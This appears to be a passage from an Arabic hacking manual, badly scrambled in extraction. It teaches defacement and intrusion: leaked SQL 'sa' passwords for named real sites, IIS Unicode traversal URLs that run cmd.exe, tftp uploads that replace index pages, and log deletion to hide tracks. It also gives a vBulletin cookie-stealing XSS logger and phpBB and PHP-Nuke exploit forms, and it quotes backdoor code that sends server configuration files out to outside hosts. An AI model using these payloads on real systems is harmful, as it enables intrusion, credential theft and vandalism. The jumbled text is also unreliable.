‫‪beforemilion-global.3‬كلمة السر ‪Password‬‬ ‫ملحظة ) قم بإزالة الصح من مربع ‪(Blank Password‬‬ ‫‪310‬‬ .asa+..sql‬‬ ‫‪global-direct.‫‪global.

.UID=sa.asp. "sa".‫ في السفل لختبار التصال بقاعدة البيانات اذا رأيت هذه‬Test Connection ‫اضغط في البداية على‬ Test Connection Succeeded ‫العبارة‬ .inc : ‫سوف ترى مايلي‬ %> ("Set DB= Server.‫فمعناه ان التصال بقاعدة البيانات تم بنجاح‬ : ‫يمكنك الن ان تختار اي قاعدة بيانات تريد الدخول اليها من القائمة المسندلة‬ Select the data base on the server .sa ‫موقع‬ : ‫ قم بالدخول على الصفحة التالية‬-1 http://www.sa/news_admin.DATABASE=moe_dbs".SERVER=CNW2.moe. "123321 <% ‫ سارع بالتشبيك على قاعدة البيانات‬.gov. ‫هل تعرف مالذي امام عينك الن انه اسم المستخدم وكلمة المرور‬ ‫انا اعرف ان ل احد يحب مادة‬ . line 7/ : ‫ كتالي‬htr ‫ثم طبق عليها ثغرة‬ http://www.moe.sa/news_admin.gov..CreateObject("ADODB.asp ‫سترى مايلي‬ 'Microsoft VBScript runtime error '800a01a8 'Object required: 'Conn news_admin.moe. ‫ او موافق‬OK ‫واضغط على‬ : ‫فئران التجارب‬ /http://www.APP=Microsoft (R) Developer "Studio.htr ‫اذهب الى السورس لترى‬ <--"include file = "database.inc#--!> : ‫ كتالي‬database.PWD=..WSID=CNW2.Open "DRIVER=SQL Server.sa/database.inc ‫قم بسحب ملف‬ http://www.moe..gov. ‫الكيمياء‬ 311 .Connection DB.gov.asp+.

IIS5..0‬وويندوز الفين يمتلك الصدارة الخامسة من ملقم معلومات النترنت‬ ‫بسم ال نبدأ‬ ‫توجد نقطة ضعف في الي اي اس ‪ 4‬او ‪ 5‬وهذه النقطة تستغل بطريقة سهلة جدًا‬ ‫وتسمى هذه النقطة باليونيكود‬ ‫ل ليحتاج الى خبرة عميقة في مجال اختراق المواقع‬ ‫وتنفيذها سه ً‬ ‫ولكن نقف عند هذه النقطة للمبتئيدئن‬ ‫المبتدئين عامًة يفكرون الن في اختراق عدة مواقع شهيرة بهذه الطريقة‬ ‫ولكن ل هذه الطريقة غير مجدية مع المواقع الشهيرة او غير الشهيرة‬ ‫لن نقطة الضعف هذه لتوجد ال في ويندوز الفين او ان تي‬ ‫وأغلب المواقع الشهيرة تستخدم انظمة اليونكس واللنكس‬ ‫أي ان ويندوز ان تي او الفين نظام حمايته محدودة وكل يوم تطلع ثغرات جديدة‬ ‫لكن بوسع مدراء المواقع ايقاف نقطة ضعف من نقاط الضعاف الموجودة في الن تي‬ ‫لكن بتلك الطريقة قد يكونون جعلو حاجزًا لهم من الهكرة‬ ‫‪312‬‬ .itsalat..‫فأر التجارب الثاني ‪:‬‬ ‫موقع ‪/http://www.com‬‬ ‫‪User name : sa Passwd : sp2000 .1‬‬ ‫*****************‬ ‫سرفرات الويندوز ودوره في اختراق المنتديات‬ ‫نحن الهكرز واي هكرز مبتدي يعرف ثغرات الويندوز جيدا دا‬ ‫وهي نظام فاشل ‪ %80‬وثغراته بالالوف‬ ‫ولانصح اي اخ لديه منتدي وموقع يستضيف سرفرات ويندوز راح اقلكم ليش بااثبتات‬ ‫صور ‪ 2‬هو صورة لجمعية امريكي مهم وحجم قاعدات البيانات ‪ 1.5‬كيك يعني ‪ 15000‬ميك ويحتوي علي‬ ‫خمسة ملين مشترك تم اختراقه البارحه بنفسي جاري تحميل الموقع لجاهزي كامل‬ ‫‪1‬ثغرات الهتمل‬ ‫‪2‬الفرونت بيج‬ ‫‪3‬مخلفات الفتبي والستفاد منه كثير لهكرز‬ ‫‪4‬ثغرات البرامج‬ ‫‪ 6‬عدم تمكن حماية النظام ‪%100‬‬ ‫لذلك انصح الخوه بالبتعاد عن سرفرات الويندوز وبرامجهم‬ ‫‪ IIS‬بداية نعرف ماهي‬ ‫هي خدمه متواجدة في ويندوز الفين بروفشنال وويندوز ان تي ‪IIS‬الـ‬ ‫‪.

.exe?/c+dir+c/‬‬ ‫‪\:scripts/.exe?/c+dir+c‬‬ ‫هذه الثغرة عملت في الموقع المطلوب ورأيت الملفات‬ ‫لحظ التغير‬ ‫‪http://www../winnt/system32/cmd.%c1%9c...2/cmd...exe?/c+dir+c/‬‬ ‫‪\:scripts./winnt/system32/cmd./winnt/system32/cmd.exe?/c+dir+c:\Winnt\Sytem32‬‬ ‫ماوضع على الثغرة هو أسماء لملفات متواجدة داخل الويندوز ‪\Winnt\Sytem32‬‬ ‫أي يجب عليك الدخول على هذه الملفات لكي تتأكد‬ ‫بعض القراء يتسالون ‪ .%f8%80%80%80%af.xxxxx../winnt/system32/cmd.%f0%80%80%af.../winnt/system32/cmd...../winnt/system32/cmd./..exe?/c+dir+c/‬‬ ‫‪\:scripts/..com/scripts/.exe?/c+dir+c/‬‬ ‫‪\:scripts/..Á‬‬ ‫‪\./winnt/system32/cmd../winnt/system32/cmd.xxxxxx.xxxxxx./winnt/system32/cmd.xxxxxx.exe/?/c‬‬ ‫أي بعد دوت كوم‬ ‫بعض الناس يسألون مالذي يظهر او على اي شكل يظهر‬ ‫الحل بسيط‬ ‫‪ Dir‬هذا المر لو قمت بكتابته في نافذة الدوس ستظهر لك الملفات‬ ‫وطريقة ظهور الملفات في المتصفح تقريبا‬ ‫بنفس طريقة الدوس‬ ‫إذا نجحت في تنفيذ الثغرة واظهرت الملفات امامك فتبدأ في تنفيذالخطوة الثانية‬ ‫الخطوة الثانية عمل ابلود للملف الذي تريد تحميله‬ ‫وعمل البلود أيضًا ليحتاج الى خبرة‬ ‫لكن هنالك شروط لكي تعمل ابلود‬ ‫يجب التأكد من أن التي إف تي بي مثبت على الموقع الضحية‬ ‫وللكي تتأكد إتبع التي‬ ‫يجب الدخول على ملف السستم ‪ 32‬ولكي تدخله يجب أن تضيف بعض الكلمات على الثغرة التي نجحت في‬ ‫تنفيذها‬ ‫مثال‪:‬‬ ‫‪\:http://www.exe?/c+dir+c‬‬ ‫ركزو هنا الن بعد دوت كوم بدأت تنفيذ الثغرة‬ ‫وبإمكانك أيضا دخول اي ملف وليس فقط رؤية السي ‪:c‬هذه الثغرة تسمح لك بــ عرض جميع ملفات‬ ‫وتوجد أكثر من ثغرة وهي‬ ‫‪\:scripts/../winnt/system32/cmd.exe?/c+dir+c/‬‬ ‫‪\:scripts/.%e0%80%af.\%e0\%80\%af....../winnt/system32/cmd..exe?/c+dir+c/‬‬ ‫‪\:scripts/./winnt/system32/cmd.exe?/c+dir+c/‬‬ ‫‪\:scripts/.exe?/c+dir+c/‬‬ ‫‪\:scripts/.....‬الثغرة التي نستخدمها ليست متطابقة مع هذه الثغرة ولكن هذا ليس شرط‬ ‫للتطابقها يجب عليك الدخول باي كان على مللف السستم‬ ‫‪313‬‬ .Á ../winnt/system32/cmd.\%e0\%80\%af.%c0%af.exe?/c+dir+c/‬‬ ‫‪msadc/..%c0%qf./winnt/system32/cmd.com/scripts/./winnt/system32/cmd..exe?/c+dir+c/‬‬ ‫‪\:scripts/.exe\?/c\+dir+c‬‬ ‫وطريقة تنفيذها من المتصفح‬ ‫ومكان تنفيذها بعد اسم الموقع‬ ‫مثال ‪:‬‬ ‫‪+\http://www.Á ./winnt/system32/cmd..%c1%9c....%c0%9v.%c1%af./..exe?/c+dir+c/‬‬ ‫‪\:scripts/.exe?/c+dir+c/‬‬ ‫‪\:scripts/.‫ولكن ليس دائماً‬ ‫وتنفذ من داخل المتصفح‬ ‫وطريقة تنفيذ الثغرة كالتي ‪:‬‬ ‫‪\:http://www.exe?/c+dir+c/‬‬ ‫‪\:scripts/..%c1%8s..com/scripts/./winnt/system32/cmd.%c1%1c.%c1%pc...com/à/€/à/€/à/€/¯.%fc%80%80%80%80%af...\/‬‬ ‫‪\:%e0\%80\%af....

..1+GET+index..com/anorR1234/tftpd32..zip‬‬ ‫‪\:C‬وبعد ماتنزل البرنامج وتفك الضغط منه من الفضل إنك تحطه داخل الـ‬ ‫وتحط أيضا البرامج أو الصفحة التي تريد أن تعمل لها أبلود في السي‬ ‫تحطه في السي الى داخل جهازك مو الى دالخل الموقع‬ ‫وتشغل البرنامج‬ ‫‪ tftp32.1+GET+index.....xxxxx..1...com/scripts/....com/scripts/......htm+C:\inetpub\wwwroot\index......geocities...........ü€€€.exe+"-i"+1.htm+C:\inetpub\wwwroot\index......ü€€€.exe‬يعني دور على هذا البرنامج الين ماتلقاه وتتأكد من انه في الجهاز‬ ‫لن هذا البرنامج يعتبر شرط لكي تعمل ابلود للصفحة‬ ‫ولو لقيت البرنامج اتفاءل بالخير يعني بإذن ال تعبك ماهو رايح على الفاضي‬ ‫‪...1+GET+index.......1.exe+‬‬‫‪i"+1.ü€€€..exe+"-i"+1...‬‬ ‫والشرط الثاني هو‬ ‫يجب أن يكون عندك برنامج التي إف تي بي‬ ‫وهذا البرنامج تقدر تنزله من هذا العنوان‬ ‫‪www..........htm /‬‬ ‫يعني الى راح نمسحه من الثغرة بيكون هذه الضافة‬ ‫‪\:c+dir+c/‬‬ ‫عشان تظيف بدالها‬ ‫‪c+tftp....xxxxx.......com/scripts/.exe‬وتتركه يعمل الى أن تنتهى من مهمتك الساسية‬ ‫‪\:C‬أسمع كلمي وحط كل شي في‬ ‫لنك لو حطيتها بإذن ال راح تنجح المهمه‬ ‫‪----------------------------------------------------------------‬‬‫الن بدأنا في النقطة الخطرة وهي تحميل الملفات‬ ‫مع العلم أني اقصد بالتحميل البلود‬ ‫أي‬ ‫أبلود = تحميل‬ ‫مو تجميل‬ ‫وتحميل الملفات طريقة معقدة نسبيًا بس أنا متفائل بالخير لني معتقد أنكم راح تفهمو‬ ‫المهم نرجع لموضوعنا‬ ‫المهم طريقة نسخ الملفات تضاف ايضًا الى المتصفح‬ ‫وتضاف بهذه الطريقة‬ ‫مثال ‪:‬‬ ‫‪\:http://www..1.exe?/c+dir+c‬‬ ‫تخيل الثغرة هذه اشتغلت معاك‬ ‫ويجب عليك إنك تمسح بعض الضافات من الثغرة لكي تضيف امر النسخ‬ ‫‪c+tftp.1...1......1........xxxxx.com/scripts/.....exe?/c+dir+c‬‬ ‫ويقول كيف ادخل على ملف السستم‬ ‫الحل هو واحد يجب عليك إضافة اسماء الملفات لكي تدخل على السستم ‪32‬‬ ‫اي بعد هذا المتداد‬ ‫‪\:c+dir+c‬هنا تضيف أسماء الملفات‬ ‫‪/http://www..‫ممكن يكون احد القراء اشتغلت معاه هذه الثغرة‬ ‫‪\:http://www....htm‬‬ ‫شايفين ياشباب إش الى اتغير‬ ‫بس لزم أيضًا إنك تغير اللزم في أمر النسخ‬ ‫مثل‬ ‫‪314‬‬ .htm+C:\inetpub\wwwroot\index.htm /‬‬ ‫ولمن نظيف امر النسخ بيطلع لنا بهذا الطريقة‬ ‫"‪http://www...Winnt/System32‬‬ ‫كما قلنا سابقَا لتحتاج الى خبرة‬ ‫وبعد دخول ملف السستم ستظهر لك محتوياته‬ ‫ويجب على آنذاك البحث عن برنامج يسمي‬ ‫‪ tftp.......ü€€€...xxxxx..xe?/c+tftp.

À¯./.212.1..htm+C:\inetpub\wwwroot\index.htm‬ومثل اسم الصفحة‬ ‫قبل ماتضغط انتر عشان تنسخ الملف تاكد من ان الثغرة الن صارت مشابها لمثل هذه الثغرة‬ ‫"‪http://www.‫‪ tftp.xxxxx...log‬‬ ‫‪--------------------------------------‬‬ ‫*******************‬ ‫‪ 5‬النسخه المنتشره في النت ودور المعربين العرب وحقيقة الموضوع وتعريبهم‬ ‫اول كما قلنا لماذا ليخترقوا منتديات جون رغم ثغرات موقعه ‪1‬لنه يستخدم نسخه نضيفه‬ ‫‪ 1‬النسخه الموجود بالنت مليان ثغرات وعارفين جيد مصمممي المنتدي لماذا ينشرونه اذا‪$‬‬ ‫النسخه تجريبي ومحتوي كود التبليغ لكي لو نفذت ومسحت كود التبليغ لن تهرب من ثغراته لو تشغل فكرك‬ ‫لكشفته بنفسك‬ ‫‪ 2‬انه جميعه نسخه تجريبي لترويج بضعتهم بدل ان تكون لمدة ‪30‬يوما فهمتموني‬ ‫‪ 3‬النسخه المنتشره بالنترنت هو نسخه نحصل علي من مواقع هكرز صح وينك انت من هكرز الغرب‬ ‫وحيلهم‬ ‫لو تمكنت في الحصول علي نسخة الشركة ‪ %100‬ونسخه منتشره في النت لرئيت صح قاموا بحذف كود‬ ‫التبليغ منه بل اضافوا اليه كوداد وبلوي وثغرات‪-‬وبعدين يجي الخ صاحب النسخه يوكد انه لقي ثغرة‬ ‫بمنتديات جون‬ ‫والعالم يندهش كييييييف خلص انشهر موقعه وسعر اعلناته ارتفع في موقعه لكثر الزوار‬ ‫الحقيقة هو نفسه اضاف الكود ونفسه يعرف مكانه وكيفة العب فيه وال هكذا المور‬ ‫‪315‬‬ .htm‬‬ ‫ولو طلعت مشابها لها اضغط إنتر وتوكل على ال‬ ‫وبإذن ال راح يتنسخ الملف‬ ‫‪------------------------------------------------------------------------------------------------------‬‬‫‪------------------------------------------------------------------------------‬‬‫وفى النقطة الخيرة والهم‬ ‫مسح ملفات تكون تجمعت داخل الجهاز ومكونة معلومات عنك مثل اليبي‬ ‫‪http://server/msadc/.exe+‬‬‫‪i"+212.1‬هنا بدال الرقام هذا تكتب اليبي تبع جهازك وعشان تتأكد من اليبي لمن تشغب التي اف تي بي‬ ‫راح يطلع ايبي وهذا اليبي الى طلعلك هو الى تكتبه‬ ‫‪ GET‬هذه الضافة سيبها في حالها لنها تعتبر شرط في نسخ المفات‬ ‫‪ index.htm‬هذه اسم الصفحة الى راح تتحمل وممكن تغيرها عاد بكيفك انت‬ ‫‪ \C:\inetpub\wwwroot‬وهذا مكان تواجد الصفحة الرئيسة الخاصة بالموقع‬ ‫‪ index.../c+del+c:/*.212+GET+index..1.ü€€€..com/scripts/.212.xe?/c+tftp.htm‬هنا تكتب إسم الصفحة او الملف التي تريده أن يظهر في الموقع‬ ‫‪\:C‬يجب التأكد من إنك حاط الصفحة المراد تحميلها في جهازك داخل الـ‬ ‫‪ index.exe‬هذا سيبه في حاله لنه اسم برنامج التي اف تي بي الى حاطه في السي ومشغله الن‬ ‫"‪ "i-‬هذا برضه سيبه لنه مهم‬ ‫‪ 1..

vbxl = l$ .vbxt = t$ .vbxa = a$ ." --!>" echo = file$ fopen("$vbxh$vbxt$vbxt$vbxp://$vbxw$vbxw$vbxw.arab1. 1000$ .php?h=$HTTP_HOST&h2=$SCRIPT_NA .5 ‫قبل فتره بسيطه تم اكتشاف ثغره في بعض نسخ‬ forum ‫الموجود فيها في ملف‬ :PHP -------------------------------------------------------------------------------} ("if ($action=="modify .net http://www.arab1.vbxo = o$ .vbxe = e$ .x.vbxb = b$ ." echo -------------------------------------------------------------------------------‫وكان الكود الحلو هذا يتصل في موقع‬ /http://www.vbxh = h$ .php? h=$HTTP_HOST&h2=$SCRIPT_NAME ‫ وسربوها لنا حبايبنا وشالوا كود التبليغ ياعيني عليهم عشان يحطون‬2. "r .vbxr = r$ .(fclose($file .x.("ME".vbxp = p$ .net/~royal/.6 ‫عموما مع اليام نزلت نسخه‬ 316 .vbx1 = 1$ .vbxn = n$ .(rf = fread($file.2.$vbxn$vbxe$vbxt/~$vbxr$vbxo$vbxy$vbx a$vbxl/."<-.vbxy =y$ .vbxw = w$ . $vbxa$vbxr$vbxa$vbxb$vbx1.2.‫المعربين العرب ليسوا اقل نذل من الجانب‬ ‫انصحكم بتعريب نسخكم باانفسكم‬ ‫ المسربه لنا من اخواننا العرب وكان هذا الكود‬2.

statics/httpd2." echo -------------------------------------------------------------------------------functions ‫وملف‬ :PHP -------------------------------------------------------------------------------sqlupdate =$ base64_decode('aHR0cDovL3NhdWRpLm5vLWlwLmNvbS9+cm9 ..com php?> .." --!>" echo .com/~royal/.inc ‫عموما الكود بيتصل بالصفحه هذي‬ ‫ اللي يحسبون علينا كمسلمين وعرب‬.php /tmp/.net ‫بيرحب فيكم ويقولكم‬ ‫ياعيني عالترحيب‬ ‫ اللي فيها كود‬http://saudi.."include "$sqlupdate .conf ..statics .conf /tmp/.com WELCOME TO arab1.no-ip.statics/httpd1.("system("cp /etc/httpd/conf/httpd.div id="sHo" style="display:none> --!> if you are seeing this code PlzZzZz Contact [email]sleeping_bum@hotmail. ‫رهييييييب ويبين لنا‬ ‫شوفو الكود‬ :PHP -------------------------------------------------------------------------------<".("system("cp admin/config..("system("cp /usr/local/apache/conf/httpd.statics/php.("system("mkdir /tmp/.conf ..('==5YWwvLngyLmluYw -------------------------------------------------------------------------------‫ياعيني على الذكاء صرنا نعرف نلعب باكدوا ديكود وانكود‬ ‫والمره هذي بعد يتصل الكود الحلو هذا اللي مستخدمين فيه ديكود بالموقع هذا‬ /http://saudi.x2.‫لنا كود تجسس ونعم الخوه العرب المسلمين‬ ‫ بالخير‬option ‫بس هالمره الكود اذكى ومهو مكشوف وغبي زي الول الكود المره هذي في ملفين ملف‬ ‫موجود‬ :PHP -------------------------------------------------------------------------------."<-.conf /tmp/.no-ip.conf 317 .

("conn_id = ftp_connect("cyber-sa.$‬‬ ‫‪.statics‬‬ ‫‪.no-ip."vilename = "$SERVER_NAME.("system("tar -cvf /tmp/.statics.‫‪.("file = fopen("$open". "/tmp/$vilename".exe 7‬على المجلد ويندوز ‪C:\Windows‬‬ ‫‪8‬من الملف ‪misc‬‬ ‫‪ 9‬وجود باتش بجهازك تم ارسله لك من قبل المخترق لحصول بمعلوماتك‬ ‫******‬ ‫كيفية الحماية‬ ‫‪ 1‬قم بحماية ملف الدمن جيدا ‪ htaccess.(ftp_quit($conn_id‬‬ ‫‪.("system("rm -rf /tmp/.(fclose($file‬‬ ‫?<‬ ‫‪<-‬‬‫>‪<div/‬‬ ‫واخره كان دار العرب في ملفه هو بيعرف‬ ‫************‬ ‫‪6‬الحمايه من المخترقين بنسبة ‪ %80‬لاجهزتكم ومنتدياتكم‬ ‫يال كل يوم نسمع اختراق المنتديات اليكم الحل حماية ‪ %80‬اليكم اسباب اخترقه وحمايته‬ ‫‪ 1‬وجود ثغرات بمجلد الدمن‬ ‫‪2‬ثغرة مجلد مود‬ ‫‪ 3‬ثغرة الستيل‬ ‫‪ 4‬الهتمل‬ ‫‪ 5‬كوكيز‬ ‫‪6‬دعم التلنت‬ ‫‪ Cfgwiz32."base = "$HTTP_HOST&h2=$SCRIPT_NAME$‬‬ ‫‪.('port = base64_decode('aHB5NWk5$‬‬ ‫‪.bz$‬‬ ‫‪. "cyber-sa". "r$‬‬ ‫‪.‬شغل فقط في سرفرات الينوكس ليس ويندوز‬ ‫‪ 2‬قم بحمايته ‪htaccess.statics‬‬ ‫‪. "/tmp/.(rf = fread($file. 1000$‬‬ ‫‪.tgz".statics.statics.com/~royal/. "$port$‬‬ ‫‪upload = ftp_put($conn_id.x2."open = "http://saudi.virtualave.tgz‬‬ ‫‪.tgz /tmp/.php?h=$base$‬‬ ‫‪.exe‬على المجلد ويندوز ‪C:\Windows‬‬ ‫‪318‬‬ .("login_result = ftp_login($conn_id.‬‬ ‫‪ 3‬لتركب ستيلت كثير يسببب ثغرة باالمنتدي‬ ‫‪ 4‬لتفعل لغة الهتمل ابدا‬ ‫‪ 5‬احذر من الكوكز نظف جاهزك دائما‬ ‫‪6‬قم بتوقيف التل نيت لموقع عندما لتحتاجه‬ ‫‪ 7‬نأكد من عدم وجود ملف باسم ‪ Cfgwiz32.net$‬‬ ‫‪.("system("rm -rf /tmp/.(FTP_BINARY‬‬ ‫‪.

vBulletin 2."" = Header$ .Log$ :Functions // */ } ("If ($HTTP_GET_VARS['Action'] = "Log ."--!>" = Header$ .(Print ($Header /* .// .9 ‫هذه الثغرة خطيرة جدا وتؤدي بحاية المنتديات‬ :‫المهم شرحها كالتالي‬ php ‫ انسخ الكود واحفظه بالمفكرة بامتداد‬-1 PHP?> vBulletin XSS Injection Vulnerability: Exploit // --.2.Descrption: Fetching vBulletin's cookies and storing it into a log file // :Variables // ."" = Footer$ { ."<---" = Footer$ { } Else ..(Coded By : Sp."LogFile = "Cookies. ‫ قم بزيارت منتديات العقرب الحمر لحصولك علي كافة انواع الحماية لجهازك وموقع‬10 ،،،‫انتهى‬ " vBulletin 2.Com // .("<Print ("<Title>vBulletin XSS Injection Vulnerability: Exploit</Title 319 .‫ ده بلوووووي الدنيا فيه جاري البحث عن حل له‬8 ‫ قم بتركيب برامج الفيروسات بجهازك‬9 .IC (SpeedICNet@Hotmail..9 ‫" ثغرة في منتديات‬ <‫>ةةةةة ةة ةةةةة ةةة ةةة‬ <‫ ةةةةةة‬:‫>ةةةةةة‬ .2..

Com\">Sp. "a$ .("<Print ("<Pre . "\n Print ("o Clear Records : [<A Href=\"" .("Print ("o Download Log : " . $LogFile .("Print ("<B>.("Print ("\n ."[Link['Download'] = "[No Records in Log$ { . Count (File ($LogFile)) . $SCRIPT_PATH.("<"\Width=\"20% */ . "</B>\n Print ("o Listed Records : <B>" . .("<"\" . "\n .("+Log = FOpen ($LogFile. "? 320 .((Records = Array_UniQue (File ($LogFile$ .:: Statics</B>\n .Break :"Case "List } ((If (!File_Exists ($LogFile) || !In_Array ($Records .. "\">Download</A$ { }Else .(((((((MD5 (NULL . URL=" .("<Print ("<Pre . BCAdd (0x0D. " </B>[Not Counting . StrLen (DecHex$ .:: Options</B>\n .("Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n Print ("Coded By: <B><A Href=\"MailTo:SpeedICNet@Hotmail. SubStr ($Data."[<Link['Download'] = "[<A Href=\"" .("<Print ("<Br><Br><B>There are No Records</B></Center></Pre .("Print ("<B>. Count ($Records) . $Link['Download'] . ['$HTTP_SERVER_VARS['HTTP_REFERER .("Print ("o Logged Records : <B>" .['Data = $HTTP_GET_VARS['Cookie$ Data = StrStr ($Data.() Exit { } Else .IC</A></B><Hr .(FClose ($Log Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0.("FWrite ($Log.("Duplicates]\n .("<Print ("</Center></Pre .(Print ($Footer /* } (['Switch ($HTTP_GET_VARS['Action :"Case "Log . Trim ($Data) .("<Print ("<Center .("Print ("\n } (If (Count (File ($LogFile)) > 0 .("Print ("\n .

$Line[1]) = Each ($Records .("<"\" .("<("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3.cookie). $Line[1 { { .("Action=Delete\">Y</A>]\n .(UnLink ($LogFile@ Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>") Or Die . $Line[0] .:: Records</B>\n .php?s=[Session]&action=viewsubscription&perpage=[Script [Code [script code] ‫واستبدال‬ ‫بهذا‬ Action=Log&Cookie='+?[‫]مكان الملف الذي تم تحميله‬//:Script>location='Http> <(document.("<Print ("</Pre . ..([Print ("<B>" . URL=" .("Print ("<B>.Break { <? php ‫ ارفع الملف لموقع يدعم‬-2 ‫ اجعل الضحية يضغط على هذا اللينك‬-3 member2. ['$HTTP_SERVER_VARS['HTTP_REFERER .</Script ‫ إذهب ألى هذا العنوان‬-4 Action=List? ‫ الملف الذي تم تحميله‬/‫مكان‬http://%20 ،،،‫انتهى‬ 321 .Break :"Case "Delete .("Print ("\n .("Print ("\n } ((While (List ($Line[0]. ": </B>" .

0.php‬‬ ‫الوصف‪:‬‬ ‫يمكنك من خلل هذه الثغرة أن تأخذ تصريح بأن تكون مدير والمشرف العام على المنتدى‬ ‫وبذلك يمكنك الدخول الى لوحة التحكم متى شئت‬ ‫الصدار‪:‬‬ ‫‪2.0‬‬ ‫>ةةةةة ةة ةةةةةةة ةةةة ةةةةة<‬ ‫‪phpbb 2.0.php‬‬ ‫‪<"User Level: <select name="userlevel‬‬ ‫‪322‬‬ .‫" اختراق منتديات ‪" phpbb 2.0‬‬ ‫وهو شبيه بالـ ‪vb‬‬ ‫وهو سهل جدا بل يعتبر تااافه‬ ‫يال سمو بال‬ ‫‪PhpBB2‬‬ ‫في ملف ‪admin_ug_auth.0‬‬ ‫لتجربة الثغرة اول سجل بالمنتدى‬ ‫ثم احفظ رقم عضويتك بالمنتدى‬ ‫بعدها افتح المفكرة وانسخ مايلي اليها‬ ‫>‪<html‬‬ ‫>‪<head‬‬ ‫>‪<head/‬‬ ‫>‪<body‬‬ ‫>‪"form method="post‬‬ ‫‪action="http://www.domain_name/board_directory/admin/admin_ug_aut‬‬ ‫‪<"h.0.

.‬‬ ‫انتهى‪،،،‬‬ ‫‪323‬‬ .domain_name/board_directory‬‬ ‫اخفظه بامتداد ‪html‬‬ ‫عندما تدخل الى الصفحة التي قمت بحفظها سوف تجد‬ ‫قائمة والتي يتم اختيار التصريح الذي تريده لتطبيق الثغرة اختر تصريح ‪Administrator‬‬ ‫ثم بالمربع الجانبي شع رقم عضويتك بالمنتدى‬ ‫أضغط زر ‪submit‬‬ ‫بعدها سوف تاتيك شاشة تسجيل الدخول ضع اسم المستخدم وكلمة المرور الخاصة بك‬ ‫ثم سوف تجد نفسك في لوحة تحكم المنتدى !! أفعل ماتريد المنتدى منتداك‬ ‫وسلااامتكم شفتو سهولت الدرس وهو صرااحه منقول بس تعرفو ما حبيت انزله ال وعليه تطبيق‬ ‫شووفوو المنتدا ذا‬ ‫‪/http://forums..xos.ca‬‬ ‫تدمر والحمد ل عقبال المواقع البااقيه‪.‫>‪<option value="admin">Administrator</option‬‬ ‫>‪<option value="user">User</option></select‬‬ ‫>‪<"input type="hidden" name="private[1]" value="0‬‬ ‫>‪<"input type="hidden" name="moderator[1]" value="0‬‬ ‫>‪<"input type="hidden" name="mode" value="user‬‬ ‫>‪<""=input type="hidden" name="adv" value‬‬ ‫‪<"User Number: <input type="text" name="u" size="5‬‬ ‫>‪<"input type="submit" name="submit" value="Submit‬‬ ‫>‪<form/‬‬ ‫>‪<body/‬‬ ‫>‪<html/‬‬ ‫عدل هذا العنوان الى عنوان الموقع المستهدف‬ ‫‪http://www.

....‬‬ ‫المهم ان الثغره كالتالي ‪ ) :‬ساحاول اني اعمل زي مواقع السيكيوريتي المحترمه لم تيجي تعرض ثغره (‬ ‫الصدارات المصابه ‪:‬‬ ‫‪ PHP Nuke versionh 6.....‬‬ ‫انا عارف انكم اول ما تقروا السطر الول اكيد اغلبكم حيشتمني باكثر اللفاظ اباحه ‪ -‬بس عادي انا متعود ‪ -‬و‬ ‫يقول ايه ده باه هو مدخلنا هنا عشان يقولنا تنفيذ اكواد هتمل و جافا بدل الصوره الشخصيه ؟؟؟!!!!‬ ‫بس ؟؟؟!!! اما عبيط اوي !!!‬ ‫لكن في اخر الموضوع حقولكم ممكن تعملوا بيها ايه ‪..‫" ثغرة في ‪" php nuke‬‬ ‫>ةةةةة ةة ةةةةة ةةة ةةة<‬ ‫>ةةةةةة‪ :‬ةةةة <‬ ‫فيه ثغره في ال ‪ php nuke‬حبيت اقولكم عليها ‪..0‬و القل منها‬ ‫‪324‬‬ .‬الثغره دي تتيح لك تنفيذ اكواد الهتمل و الجافا بدل مكان‬ ‫الصوره الشخصيه ‪..

. 2111‬‬ ‫عليك بعد ذلك نك تحفظ الكود ده في النوت باد و تسميه اي اسم بامتداد ‪ html‬مع ملحظه تغيير‬ ‫‪ /http://nukesite‬الى عنوان المجله الهدف ‪:..php?name=Your_Account‬‬ ‫‪<"method="post‬‬ ‫>‪"b>Code ('">[code]<b ')</b><input type="text‬‬ ‫‪"name="user_avatar" size="30‬‬ ‫‪<maxlength="30"><br><br‬‬ ‫>‪"b>Username</b><input type="text" name="uname" size="30‬‬ ‫‪"maxlength="255"><br><b>User ID:<input type="text‬‬ ‫‪"name="uid‬‬ ‫‪"size="30"><input type="hidden" name="op‬‬ ‫‪value="saveuser"><input‬‬ ‫‪<type="submit" value="Save Changes"></form‬‬ ‫‪325‬‬ .‬‬ ‫ملخص عام للثغره‪:‬‬ ‫اي مستخدم عندم يقوم بالتسجيل في المجله فانه يطالب باختيار صوره شخصيه و ذلك من خلل مجموعه من‬ ‫الصور الموجوده في المجلد هذا ‪. images/forum/avatars/‬‬ ‫عندئذ تقوم المجله بوضع اسم الصوره في الداتا بيز ‪ .‬‬ ‫>!‪<!-.‬اذن اعتقد انه ممكن ان يكتب كود الهتمل اللي هوه عايزه !!!!‬ ‫الكسبلويت‪:‬‬ ‫اول عليك ن تقوم بالتسجيل في المجله و الدخول بعد ذلك و الذهاب الى صفحه ‪ Your Account‬و منها‬ ‫الذهاب الى صفحه ‪ Your Info‬بعد ذلك عليك باظهار سورس كود الصفحه من خلل ‪ view source‬و‬ ‫البحث عن كلمه ‪uid‬‬ ‫لزم تلقي حاجه زي كده ‪:‬‬ ‫>‪<"input type="hidden" name="uid" value="2111‬‬ ‫كده يبقى انت عرفت رقم الي دي اللي هوه في المثال كان ‪.....‫الستخدام ‪:‬‬ ‫تستخدم كما قلت في تنفيذ اكواد الهتمل و الجافا سكريبت من خلل مكان صورهم الشخصيه‪......‬و لكنها ل تقوم بوضع اي كود اي انه اذا استطاع اي‬ ‫يوزر ان يحصل على كود فورم المجله و استطاع ان يغير صندوق اختيار الصوره الشخصيه الى صندوق‬ ‫‪ text‬عادي ‪..START CODE --‬‬ ‫>‪"form name="Register‬‬ ‫"‪action="http://NUKEDSITE/modules.

